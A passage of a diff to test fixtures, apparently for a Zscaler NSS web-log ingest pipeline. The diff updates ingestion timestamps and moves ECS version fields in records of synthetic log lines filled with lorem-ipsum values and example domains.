Yowser/2.5 Safari/537.36^^department=ueporroq^^user=ute^^event_id=mexer^^clienttranstime=iam^^requestmethod=Bonoru^^requestsize=1396^^requestversion=ntutlab^^status=rumSecti^^responsesize=5091^^responseversion=gnama^^transactionsize=7815", "event": { - "ingested": "2021-06-14T08:26:19.845046Z" + "ingested": "2021-12-14T14:59:54.590738061Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tesse ZSCALERNSS: time=olupta Dec 29 3:15:58 2017^^timezone=GMT+02:00^^action=Blocked^^reason=success^^hostname=ine3181.www.invalid^^protocol=ipv6-icmp^^serverip=10.119.53.68^^url=https://www.example.com/uiavo/uisaut.htm?paq=uianon#nul^^urlcategory=onse^^urlclass=sitam^^dlpdictionaries=inibusBo^^dlpengine=illoin^^filetype=emUtenim^^threatcategory=ende^^threatclass=dexea^^pagerisk=aco^^threatname=sse^^clientpublicIP=ihilm^^ClientIP=10.121.9.5^^location=uptas^^refererURL=https://www5.example.net/ons/unt.txt?ctetur=mvolupta#squame^^useragent=Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=mea^^user=ssec^^event_id=illum^^clienttranstime=eprehe^^requestmethod=tinvolup^^requestsize=497^^requestversion=tvol^^status=ptat^^responsesize=7456^^responseversion=tdolo^^transactionsize=1882", "event": { - "ingested": "2021-06-14T08:26:19.845051Z" + "ingested": "2021-12-14T14:59:54.590738445Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eleumi ZSCALERNSS: time=equ Jan 12 10:18:32 2018^^timezone=GMT-07:00^^action=Blocked^^reason=unknown^^hostname=tsunt3403.www5.test^^protocol=udp^^serverip=10.237.0.173^^url=https://mail.example.com/uasiarch/Malor.jpg?iinea=snos#upt^^urlcategory=oremipsu^^urlclass=tMalor^^dlpdictionaries=oreetd^^dlpengine=lor^^filetype=oreeu^^threatcategory=taspe^^threatclass=eritqui^^pagerisk=atquovol^^threatname=evel^^clientpublicIP=edol^^ClientIP=10.31.153.177^^location=maccus^^refererURL=https://www.example.com/totamrem/aliqu.htm?sBonorum=moenimi#lor^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16^^department=tiset^^user=sci^^event_id=periam^^clienttranstime=fugiatnu^^requestmethod=dolor^^requestsize=4350^^requestversion=eumfu^^status=docons^^responsesize=1428^^responseversion=eumf^^transactionsize=6826", "event": { - "ingested": "2021-06-14T08:26:19.845055800Z" + "ingested": "2021-12-14T14:59:54.590739035Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uasi ZSCALERNSS: time=maveniam Jan 27 5:21:06 2018^^timezone=PST^^action=Allowed^^reason=success^^hostname=pitl6126.www.localdomain^^protocol=ipv6-icmp^^serverip=10.243.182.229^^url=https://api.example.org/ntiumt/sumquia.jpg?lam=asnu#com^^urlcategory=rep^^urlclass=mveni^^dlpdictionaries=aquae^^dlpengine=olo^^filetype=edolori^^threatcategory=iaturE^^threatclass=epor^^pagerisk=umexer^^threatname=amnih^^clientpublicIP=tper^^ClientIP=10.229.102.140^^location=nulamc^^refererURL=https://www.example.org/etcon/ctobeat.txt?eddoei=lorumw#eca^^useragent=mobmail android 2.1.3.3150^^department=nimve^^user=duntut^^event_id=emporin^^clienttranstime=oreseosq^^requestmethod=etquasia^^requestsize=1800^^requestversion=tium^^status=nimip^^responsesize=7612^^responseversion=squamest^^transactionsize=3914", "event": { - "ingested": "2021-06-14T08:26:19.845060500Z" + "ingested": "2021-12-14T14:59:54.590739423Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pteu ZSCALERNSS: time=uatD Feb 10 12:23:41 2018^^timezone=CEST^^action=Blocked^^reason=unknown^^hostname=remaper3297.internal.test^^protocol=ipv6-icmp^^serverip=10.39.46.155^^url=https://example.com/itsedqu/paq.jpg?hilmol=oluptate#todi^^urlcategory=emvel^^urlclass=pta^^dlpdictionaries=dolo^^dlpengine=itaedi^^filetype=hend^^threatcategory=remagna^^threatclass=adipisc^^pagerisk=aparia^^threatname=maliq^^clientpublicIP=ccusant^^ClientIP=10.120.138.109^^location=oidentsu^^refererURL=https://internal.example.org/onsec/dit.gif?lup=aeca#isau^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=sciveli^^user=picia^^event_id=BCSe^^clienttranstime=rem^^requestmethod=exer^^requestsize=447^^requestversion=remips^^status=lapari^^responsesize=5763^^responseversion=radipis^^transactionsize=3991", "event": { - "ingested": "2021-06-14T08:26:19.845064900Z" + "ingested": "2021-12-14T14:59:54.590739813Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "luptate ZSCALERNSS: time=eritqu Feb 24 7:26:15 2018^^timezone=ET^^action=Blocked^^reason=failure^^hostname=tamr1693.api.home^^protocol=ipv6^^serverip=10.53.191.49^^url=https://api.example.org/remeum/etur.html?Quisa=quiav#ctionofd^^urlcategory=elit^^urlclass=sam^^dlpdictionaries=tMal^^dlpengine=porin^^filetype=metMal^^threatcategory=ciati^^threatclass=ecillum^^pagerisk=olor^^threatname=amei^^clientpublicIP=doconseq^^ClientIP=10.133.102.57^^location=CSed^^refererURL=https://example.net/wri/itame.html?dictasun=psa#lorese^^useragent=Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36^^department=ctobeat^^user=onsec^^event_id=idestl^^clienttranstime=litani^^requestmethod=emp^^requestsize=6397^^requestversion=onoru^^status=data^^responsesize=6740^^responseversion=eosqui^^transactionsize=5993", "event": { - "ingested": "2021-06-14T08:26:19.845069500Z" + "ingested": "2021-12-14T14:59:54.590740317Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uam ZSCALERNSS: time=quis Mar 11 2:28:49 2018^^timezone=PST^^action=Allowed^^reason=failure^^hostname=cia5990.api.localdomain^^protocol=icmp^^serverip=10.91.2.225^^url=https://internal.example.org/ree/itten.gif?rsp=imipsa#nostrum^^urlcategory=autodita^^urlclass=ntut^^dlpdictionaries=temveleu^^dlpengine=itametco^^filetype=etcons^^threatcategory=etco^^threatclass=iuntN^^pagerisk=utfugi^^threatname=ursintoc^^clientpublicIP=tio^^ClientIP=10.89.41.97^^location=trudex^^refererURL=https://www.example.net/lup/mipsamv.htm?qua=ionula#pexeaco^^useragent=Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36^^department=nderi^^user=tem^^event_id=tcu^^clienttranstime=eumiu^^requestmethod=nim^^requestsize=141^^requestversion=rehen^^status=uaeab^^responsesize=5521^^responseversion=serro^^transactionsize=1078", "event": { - "ingested": "2021-06-14T08:26:19.845074Z" + "ingested": "2021-12-14T14:59:54.590740825Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eturadip ZSCALERNSS: time=amquaera Mar 25 9:31:24 2018^^timezone=PT^^action=Allowed^^reason=success^^hostname=riatu2467.lan^^protocol=tcp^^serverip=10.221.20.165^^url=https://www.example.net/ritquiin/reseo.jpg?ari=umtot#onemulla^^urlcategory=atquo^^urlclass=borio^^dlpdictionaries=equatD^^dlpengine=uidol^^filetype=inculpa^^threatcategory=ruredol^^threatclass=iadeseru^^pagerisk=loremagn^^threatname=acons^^clientpublicIP=nimadmi^^ClientIP=10.7.18.226^^location=umiurer^^refererURL=https://internal.example.com/oluptass/uidol.txt?ametcon=ofdeFini#tasnu^^useragent=Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=tionev^^user=uasiarch^^event_id=velites^^clienttranstime=uredolor^^requestmethod=epreh^^requestsize=5810^^requestversion=edquiaco^^status=sequatD^^responsesize=4211^^responseversion=naaliq^^transactionsize=4508", "event": { - "ingested": "2021-06-14T08:26:19.845078400Z" + "ingested": "2021-12-14T14:59:54.590741263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "asiarc ZSCALERNSS: time=lor Apr 8 4:33:58 2018^^timezone=GMT+02:00^^action=Allowed^^reason=unknown^^hostname=pici1525.www5.corp^^protocol=ipv6^^serverip=10.178.148.188^^url=https://mail.example.com/dexe/nemul.jpg?yCicero=inimave#eavolupt^^urlcategory=uipe^^urlclass=ipsa^^dlpdictionaries=con^^dlpengine=eirured^^filetype=sequamn^^threatcategory=perspici^^threatclass=inimve^^pagerisk=aea^^threatname=emipsumd^^clientpublicIP=didun^^ClientIP=10.155.252.123^^location=asiarch^^refererURL=https://www5.example.net/utla/deomni.gif?fugi=nse#nesciu^^useragent=Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80^^department=ssequ^^user=inrepreh^^event_id=rit^^clienttranstime=velitess^^requestmethod=niam^^requestsize=6665^^requestversion=vel^^status=ionevo^^responsesize=4580^^responseversion=ptate^^transactionsize=52", "event": { - "ingested": "2021-06-14T08:26:19.845082900Z" + "ingested": "2021-12-14T14:59:54.590741659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umfu ZSCALERNSS: time=utla Apr 22 11:36:32 2018^^timezone=CET^^action=Blocked^^reason=failure^^hostname=dolo6418.internal.host^^protocol=ipv6-icmp^^serverip=10.190.42.245^^url=https://mail.example.org/caecat/uel.html?enim=umq#sistena^^urlcategory=qui^^urlclass=caboN^^dlpdictionaries=imipsam^^dlpengine=eumiu^^filetype=tatevel^^threatcategory=quela^^threatclass=uamquaer^^pagerisk=texplica^^threatname=enimi^^clientpublicIP=illum^^ClientIP=10.220.1.249^^location=iqu^^refererURL=https://api.example.org/eumfugia/reeufugi.gif?uredol=uptat#toditau^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16^^department=quuntur^^user=olup^^event_id=aeab^^clienttranstime=uradipis^^requestmethod=aerat^^requestsize=2910^^requestversion=uira^^status=eosqui^^responsesize=3723^^responseversion=quinesc^^transactionsize=4724", "event": { - "ingested": "2021-06-14T08:26:19.845087400Z" + "ingested": "2021-12-14T14:59:54.590742043Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aliqu ZSCALERNSS: time=sequine May 7 6:39:06 2018^^timezone=GMT-07:00^^action=Allowed^^reason=unknown^^hostname=imveni193.www5.host^^protocol=udp^^serverip=10.112.190.154^^url=https://mail.example.com/runtmoll/busBon.txt?ionev=vitaedi#rna^^urlcategory=cons^^urlclass=Except^^dlpdictionaries=lestiae^^dlpengine=iav^^filetype=umiure^^threatcategory=isiut^^threatclass=tin^^pagerisk=rporiss^^threatname=billoinv^^clientpublicIP=etconse^^ClientIP=10.55.38.153^^location=quido^^refererURL=https://example.org/uames/tla.gif?rch=psa#nreprehe^^useragent=Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g^^department=tvolup^^user=oremeu^^event_id=lab^^clienttranstime=lla^^requestmethod=urau^^requestsize=6127^^requestversion=upt^^status=equamni^^responsesize=363^^responseversion=eroi^^transactionsize=916", "event": { - "ingested": "2021-06-14T08:26:19.845091900Z" + "ingested": "2021-12-14T14:59:54.590742422Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mdo ZSCALERNSS: time=labore May 21 1:41:41 2018^^timezone=OMST^^action=Allowed^^reason=success^^hostname=ionu3320.api.localhost^^protocol=igmp^^serverip=10.195.153.42^^url=https://api.example.com/lits/tvolu.jpg?squir=gnaaliq#quam^^urlcategory=deriti^^urlclass=edictasu^^dlpdictionaries=eturadi^^dlpengine=umS^^filetype=noru^^threatcategory=aliquide^^threatclass=tDuisaut^^pagerisk=uel^^threatname=dexerc^^clientpublicIP=vol^^ClientIP=10.250.48.82^^location=iqu^^refererURL=https://api.example.com/quuntur/nihi.gif?oremagna=aqu#utemvele^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=serrorsi^^user=tsedquia^^event_id=rsit^^clienttranstime=quis^^requestmethod=upidatat^^requestsize=2982^^requestversion=nihilmo^^status=reetdo^^responsesize=6578^^responseversion=nidol^^transactionsize=4345", "event": { - "ingested": "2021-06-14T08:26:19.845096800Z" + "ingested": "2021-12-14T14:59:54.590743394Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hite ZSCALERNSS: time=umfugi Jun 4 8:44:15 2018^^timezone=CT^^action=Blocked^^reason=unknown^^hostname=remips1499.www.local^^protocol=ipv6^^serverip=10.252.164.230^^url=https://mail.example.net/loremi/queporro.jpg?ade=nihilmol#nder^^urlcategory=ano^^urlclass=rumexer^^dlpdictionaries=eab^^dlpengine=iaconseq^^filetype=tseddo^^threatcategory=diduntut^^threatclass=rroq^^pagerisk=olore^^threatname=eratvolu^^clientpublicIP=oconsequ^^ClientIP=10.60.52.219^^location=untNeq^^refererURL=https://internal.example.org/scipit/litess.jpg?ide=quunturm#quovo^^useragent=mobmail android 2.1.3.3150^^department=usan^^user=gnamali^^event_id=iumtota^^clienttranstime=issusci^^requestmethod=fdeFin^^requestsize=2871^^requestversion=psu^^status=strud^^responsesize=501^^responseversion=saute^^transactionsize=7421", "event": { - "ingested": "2021-06-14T08:26:19.845101500Z" + "ingested": "2021-12-14T14:59:54.590743796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iumto ZSCALERNSS: time=sequatu Jun 19 3:46:49 2018^^timezone=CT^^action=Allowed^^reason=success^^hostname=mdoloree96.domain^^protocol=ggp^^serverip=10.187.16.73^^url=https://api.example.com/nge/psum.gif?exerci=isnostru#iad^^urlcategory=ngelits^^urlclass=volupt^^dlpdictionaries=billoi^^dlpengine=reseo^^filetype=quam^^threatcategory=ulpaquio^^threatclass=dipisc^^pagerisk=litsed^^threatname=lumd^^clientpublicIP=tiaec^^ClientIP=10.122.102.156^^location=totamr^^refererURL=https://mail.example.org/aper/entor.txt?lumdol=edutper#utemve^^useragent=Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=metMa^^user=emoen^^event_id=ptate^^clienttranstime=mipsumqu^^requestmethod=turad^^requestsize=1704^^requestversion=billo^^status=doloremi^^responsesize=3365^^responseversion=iciatis^^transactionsize=2052", "event": { - "ingested": "2021-06-14T08:26:19.845106100Z" + "ingested": "2021-12-14T14:59:54.590744187Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cul ZSCALERNSS: time=tate Jul 3 10:49:23 2018^^timezone=CEST^^action=Allowed^^reason=failure^^hostname=iatnulap7662.internal.local^^protocol=igmp^^serverip=10.120.215.174^^url=https://internal.example.org/ddoeiusm/apa.txt?uptatemU=rem#onorumet^^urlcategory=iscivel^^urlclass=rinci^^dlpdictionaries=eacomm^^dlpengine=aboNem^^filetype=mull^^threatcategory=ent^^threatclass=rema^^pagerisk=mcol^^threatname=tion^^clientpublicIP=umquia^^ClientIP=10.248.108.55^^location=itation^^refererURL=https://internal.example.org/tat/uredo.html?essequam=imav#mtot^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16^^department=tionemu^^user=prehend^^event_id=ntexplic^^clienttranstime=rvelillu^^requestmethod=uatDu^^requestsize=4620^^requestversion=isu^^status=moll^^responsesize=2104^^responseversion=ota^^transactionsize=4562", "event": { - "ingested": "2021-06-14T08:26:19.845110800Z" + "ingested": "2021-12-14T14:59:54.590744578Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eniamq ZSCALERNSS: time=aloru Jul 17 5:51:58 2018^^timezone=PT^^action=Allowed^^reason=success^^hostname=sBonoru1929.example^^protocol=ggp^^serverip=10.51.161.245^^url=https://www5.example.net/yCice/uinesci.htm?taevitae=dminimv#quam^^urlcategory=saute^^urlclass=umdol^^dlpdictionaries=rerepr^^dlpengine=ipiscin^^filetype=trudexe^^threatcategory=qua^^threatclass=modit^^pagerisk=tatione^^threatname=aedicta^^clientpublicIP=squamest^^ClientIP=10.15.254.181^^location=emipsum^^refererURL=https://example.com/eFini/atDuisa.jpg?mips=dolo#reeufu^^useragent=Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61^^department=adipis^^user=abo^^event_id=suntex^^clienttranstime=uptatema^^requestmethod=uteiru^^requestsize=4600^^requestversion=Cicero^^status=ven^^responsesize=5410^^responseversion=ficia^^transactionsize=7526", "event": { - "ingested": "2021-06-14T08:26:19.845115300Z" + "ingested": "2021-12-14T14:59:54.590745033Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "deFinibu ZSCALERNSS: time=iaecons Aug 1 12:54:32 2018^^timezone=ET^^action=Blocked^^reason=success^^hostname=onorumet4871.lan^^protocol=ipv6^^serverip=10.7.152.238^^url=https://api.example.com/itinvolu/adeserun.txt?tinv=Utenima#nse^^urlcategory=umq^^urlclass=enim^^dlpdictionaries=oreve^^dlpengine=metco^^filetype=xercita^^threatcategory=atev^^threatclass=vento^^pagerisk=litsed^^threatname=ciun^^clientpublicIP=rehender^^ClientIP=10.129.66.196^^location=mmodicon^^refererURL=https://api.example.com/tqu/emips.gif?tinvolu=ptat#amquisn^^useragent=Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=dol^^user=equamn^^event_id=scipi^^clienttranstime=rem^^requestmethod=reh^^requestsize=3604^^requestversion=gnama^^status=ursintoc^^responsesize=6628^^responseversion=ction^^transactionsize=491", "event": { - "ingested": "2021-06-14T08:26:19.845120100Z" + "ingested": "2021-12-14T14:59:54.590745423Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "siuta ZSCALERNSS: time=atcu Aug 15 7:57:06 2018^^timezone=PST^^action=Blocked^^reason=success^^hostname=onproi4354.www5.invalid^^protocol=ggp^^serverip=10.29.162.157^^url=https://www.example.org/sci/isquames.gif?tlabor=itecto#loreeuf^^urlcategory=orainci^^urlclass=orese^^dlpdictionaries=aev^^dlpengine=uelaudan^^filetype=lab^^threatcategory=sequa^^threatclass=orinrep^^pagerisk=pta^^threatname=uradi^^clientpublicIP=sequu^^ClientIP=10.185.107.27^^location=susc^^refererURL=https://www.example.org/eatae/siutali.html?quelauda=rcit#dolo^^useragent=Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]^^department=orese^^user=evelite^^event_id=remquela^^clienttranstime=toreve^^requestmethod=squirat^^requestsize=2977^^requestversion=equunt^^status=mto^^responsesize=4116^^responseversion=atio^^transactionsize=6258", "event": { - "ingested": "2021-06-14T08:26:19.845124700Z" + "ingested": "2021-12-14T14:59:54.590745807Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rem ZSCALERNSS: time=consecte Aug 29 2:59:40 2018^^timezone=ET^^action=Blocked^^reason=success^^hostname=beataevi7552.api.test^^protocol=ipv6^^serverip=10.215.63.248^^url=https://mail.example.org/umdolo/nimv.htm?equunt=tutla#usmod^^urlcategory=ine^^urlclass=qui^^dlpdictionaries=itse^^dlpengine=lapari^^filetype=Bonor^^threatcategory=ipex^^threatclass=odita^^pagerisk=metc^^threatname=aincidu^^clientpublicIP=reprehe^^ClientIP=10.138.0.214^^location=uisaut^^refererURL=https://internal.example.org/ommodic/mmodic.txt?esse=nihi#xeaco^^useragent=Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61^^department=uianonn^^user=eavolupt^^event_id=dantium^^clienttranstime=ors^^requestmethod=dqu^^requestsize=6682^^requestversion=edi^^status=eumiure^^responsesize=1926^^responseversion=eacomm^^transactionsize=2676", "event": { - "ingested": "2021-06-14T08:26:19.845129200Z" + "ingested": "2021-12-14T14:59:54.590746211Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pre ZSCALERNSS: time=aute Sep 12 10:02:15 2018^^timezone=PST^^action=Allowed^^reason=success^^hostname=rvelill1981.www.invalid^^protocol=udp^^serverip=10.26.115.88^^url=https://mail.example.net/tvol/ostru.htm?oei=iquipex#byCice^^urlcategory=deritq^^urlclass=boreetdo^^dlpdictionaries=teni^^dlpengine=iin^^filetype=nostr^^threatcategory=luptatem^^threatclass=tNequepo^^pagerisk=liq^^threatname=eleumiu^^clientpublicIP=etdol^^ClientIP=10.12.130.224^^location=magnido^^refererURL=https://www.example.org/dolor/ing.jpg?umdo=aer#quela^^useragent=Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=itatis^^user=Nequepo^^event_id=edictas^^clienttranstime=emac^^requestmethod=rmagnido^^requestsize=6135^^requestversion=elitsedd^^status=hitecto^^responsesize=6315^^responseversion=repreh^^transactionsize=1238", "event": { - "ingested": "2021-06-14T08:26:19.845133700Z" + "ingested": "2021-12-14T14:59:54.590746600Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "usan ZSCALERNSS: time=ugiatn Sep 27 5:04:49 2018^^timezone=GMT+02:00^^action=Blocked^^reason=failure^^hostname=quia7214.example^^protocol=igmp^^serverip=10.193.152.42^^url=https://mail.example.org/pariatur/cita.html?equuntur=rve#atemacc^^urlcategory=labore^^urlclass=iqua^^dlpdictionaries=ciunt^^dlpengine=exea^^filetype=ostrumex^^threatcategory=eruntmol^^threatclass=plicab^^pagerisk=imide^^threatname=uiineav^^clientpublicIP=nder^^ClientIP=10.91.20.27^^location=asia^^refererURL=https://api.example.com/psamvolu/teturad.jpg?iavol=psumdol#urautodi^^useragent=Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36^^department=modtempo^^user=edict^^event_id=nost^^clienttranstime=orisnis^^requestmethod=umq^^requestsize=2801^^requestversion=quatur^^status=isiutali^^responsesize=1508^^responseversion=emquel^^transactionsize=365", "event": { - "ingested": "2021-06-14T08:26:19.845139700Z" + "ingested": "2021-12-14T14:59:54.590747051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iavol ZSCALERNSS: time=utemvel Oct 11 12:07:23 2018^^timezone=PST^^action=Allowed^^reason=failure^^hostname=aturExc7343.invalid^^protocol=ipv6^^serverip=10.146.69.38^^url=https://example.org/aturE/aaliqu.gif?nvol=doloreeu#elillumq^^urlcategory=loremeum^^urlclass=luptatem^^dlpdictionaries=ing^^dlpengine=hen^^filetype=riameaqu^^threatcategory=etd^^threatclass=omnisi^^pagerisk=dolor^^threatname=rsp^^clientpublicIP=quir^^ClientIP=10.55.192.102^^location=tsuntinc^^refererURL=https://example.org/onproid/ciduntut.html?xer=iat#orain^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=uame^^user=quia^^event_id=Exce^^clienttranstime=nim^^requestmethod=userro^^requestsize=1008^^requestversion=uta^^status=tsun^^responsesize=7120^^responseversion=gni^^transactionsize=5280", "event": { - "ingested": "2021-06-14T08:26:19.845144700Z" + "ingested": "2021-12-14T14:59:54.590747436Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tione ZSCALERNSS: time=nibus Oct 25 7:09:57 2018^^timezone=GMT-07:00^^action=Allowed^^reason=success^^hostname=olo7317.www5.localhost^^protocol=udp^^serverip=10.249.1.143^^url=https://internal.example.org/olorin/orisnisi.gif?eritquii=atevelit#dese^^urlcategory=ptasn^^urlclass=liqui^^dlpdictionaries=ectetur^^dlpengine=eacomm^^filetype=temqu^^threatcategory=tdolore^^threatclass=Utenim^^pagerisk=quisno^^threatname=quaUten^^clientpublicIP=eufugia^^ClientIP=10.124.177.226^^location=iarc^^refererURL=https://www5.example.org/ncidunt/uiac.jpg?luptat=ehend#involupt^^useragent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36^^department=tincul^^user=isciveli^^event_id=ntutlab^^clienttranstime=sitamet^^requestmethod=onevo^^requestsize=3736^^requestversion=nsequ^^status=ing^^responsesize=3291^^responseversion=vitaed^^transactionsize=7672", "event": { - "ingested": "2021-06-14T08:26:19.845149300Z" + "ingested": "2021-12-14T14:59:54.590747822Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "modit ZSCALERNSS: time=quamnih Nov 9 2:12:32 2018^^timezone=OMST^^action=Blocked^^reason=failure^^hostname=uiin1342.mail.invalid^^protocol=rdp^^serverip=10.167.176.220^^url=https://example.org/vel/preh.html?sequamni=edutpers#deo^^urlcategory=eni^^urlclass=quipe^^dlpdictionaries=oluptat^^dlpengine=stenatus^^filetype=eabillo^^threatcategory=iaecon^^threatclass=ect^^pagerisk=tquid^^threatname=seru^^clientpublicIP=oriss^^ClientIP=10.146.228.249^^location=psumdolo^^refererURL=https://example.net/bor/magnido.html?emagnaal=nih#ncididu^^useragent=Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]^^department=gitsed^^user=estla^^event_id=ione^^clienttranstime=ecillum^^requestmethod=maccu^^requestsize=5298^^requestversion=quisquam^^status=boreet^^responsesize=620^^responseversion=Malorumw^^transactionsize=5212", "event": { - "ingested": "2021-06-14T08:26:19.845153800Z" + "ingested": "2021-12-14T14:59:54.590748204Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "issu ZSCALERNSS: time=tconsect Nov 23 9:15:06 